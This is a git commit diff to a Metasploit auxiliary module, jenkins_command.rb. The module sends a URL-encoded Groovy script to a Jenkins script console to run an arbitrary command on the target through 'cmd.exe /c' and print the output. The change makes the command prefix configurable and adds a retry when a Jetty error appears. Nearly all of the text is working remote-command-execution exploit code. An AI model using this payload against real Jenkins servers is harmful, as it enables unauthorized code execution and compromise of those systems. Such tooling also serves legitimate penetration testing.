Updated.

digitalarche · Sep 2, 2015 · 951f2e7 · 951f2e7
1 parent cba6525
commit 951f2e7
Showing 1 changed file with 12 additions and 11 deletions.
diff --git a/msf-mods/jenkins_command.rb b/msf-mods/jenkins_command.rb
@@ -43,26 +43,27 @@ def initialize(info = {})
  deregister_options('VHOST')
  end
 
- def run_host(ip)
+ def run_host(ip, prefix="cmd.exe /c", try=1)
  command = datastore['COMMAND'].gsub("\\", "\\\\\\")
  res = send_request_cgi(
  {
  'uri' => target_uri.path,
  'method' => 'POST',
  'ctype' => 'application/x-www-form-urlencoded',
- 'data' => "script=def+sout+%3D+new+StringBuffer%28%29%2C+serr+%3D+new+StringBuffer%28%29%0D%0Adef+proc+%3D+%27cmd.exe+%2Fc+#{command}%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%26gt%3B+%24sout+err%26gt%3B+%24serr%22%0D%0A&json=%7B%22script%22%3A+%22def+sout+%3D+new+StringBuffer%28%29%2C+serr+%3D+new+StringBuffer%28%29%5Cndef+proc+%3D+%27cmd.exe+%2Fc+#{command}%27.execute%28%29%5Cnproc.consumeProcessOutput%28sout%2C+serr%29%5Cnproc.waitForOrKill%281000%29%5Cnprintln+%5C%22out%26gt%3B+%24sout+err%26gt%3B+%24serr%5C%22%5Cn%22%2C+%22%22%3A+%22def+sout+%3D+new+StringBuffer%28%29%2C+serr+%3D+new+StringBuffer%28%29%5Cndef+proc+%3D+%27cmd.exe+%2Fc+#{command}%27.execute%28%29%5Cnproc.consumeProcessOutput%28sout%2C+serr%29%22%7D&Submit=Run"
+ 'data' => "script=def+sout+%3D+new+StringBuffer%28%29%2C+serr+%3D+new+StringBuffer%28%29%0D%0Adef+proc+%3D+%27#{prefix}+#{command}%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%26gt%3B+%24sout+err%26gt%3B+%24serr%22%0D%0A&json=%7B%22script%22%3A+%22def+sout+%3D+new+StringBuffer%28%29%2C+serr+%3D+new+StringBuffer%28%29%5Cndef+proc+%3D+%27#{prefix}+#{command}%27.execute%28%29%5Cnproc.consumeProcessOutput%28sout%2C+serr%29%5Cnproc.waitForOrKill%281000%29%5Cnprintln+%5C%22out%26gt%3B+%24sout+err%26gt%3B+%24serr%5C%22%5Cn%22%2C+%22%22%3A+%22def+sout+%3D+new+StringBuffer%28%29%2C+serr+%3D+new+StringBuffer%28%29%5Cndef+proc+%3D+%27#{prefix}+#{command}%27.execute%28%29%5Cnproc.consumeProcessOutput%28sout%2C+serr%29%22%7D&Submit=Run"
  }).body.to_s
-
- unless res.nil?
- output = res.scan(/<pre>(.*?)<\/pre>/m)[1][0][12..-1].gsub("err&amp;gt;", "")
- end
-
- if output.include? "groovy.control.MultipleCompilationErrorsException" or res.nil?
+ if res.nil?
  print_error("#{rhost}:#{rport} - An unknown error occurred when running the command.")
  else
- print_good("#{rhost}:#{rport} - The server responded with the following output:")
- print_good(output)
- report_data(ip, command)
+ output = res.scan(/<pre>(.*?)<\/pre>/m)[1][0][12..-1].gsub("err&amp;gt;", "")
+ if output.include? "org.eclipse.jetty.server." and try == 1
+ run_host(ip, "", 2)
+ elsif output.include? "org.eclipse.jetty.server." and try == 2
+ print_error("The peovided command is not valid. Try again.")
+ else
+ print_good("The command executed. Output:")
+ print_good(output)
+ end
  end
  end